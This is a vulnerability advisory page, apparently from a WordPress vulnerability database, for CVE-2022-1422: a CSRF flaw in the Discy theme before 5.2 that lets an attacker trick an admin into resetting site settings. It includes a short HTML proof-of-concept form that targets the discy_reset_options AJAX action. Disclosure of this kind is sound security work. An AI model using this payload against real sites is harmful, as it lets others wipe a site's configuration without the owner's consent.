Discy < 5.2 – Restore Default Settings via CSRF | CVE 2022-1422 | Theme Vulnerabilities

Description

The theme does not check for CSRF tokens in the AJAX action discy_reset_options, allowing an attacker to trick an admin into resetting the site settings back to defaults.

Proof of Concept

<html>
  <body>
    <form action="http://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="discy_reset_options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Themes

Fixed in 5.2

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bikram Kharal

Submitter

Bikram Kharal

Submitter twitter

Verified

Yes

WPVDB ID

29aff4bf-1691-4dc1-a670-1f2c9a765a3b

Timeline

Publicly Published

2022-05-16 (about 3 years ago)

Added

2022-05-16 (about 3 years ago)

Last Updated

2022-05-17 (about 3 years ago)

Other

Published

Title

Published

2025-04-24

Title

Vasaio QR Code <= 1.2.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-04-04

Title

QR Code Tag for WC order emails <= 1.9.41 - Cross-Site Request Forgery

Published

2024-03-29

Title

Change default login logo,url and title <= 2.0 - Cross-Site Request Forgery

Published

2022-04-25

Title

WP-Invoice <= 4.3.1 - Stored Cross-Site Scripting via CSRF

Published

2024-04-15

Title

Delete Custom Fields <= 0.3.1 - Cross-Site Request Forgery to Post Meta Deletion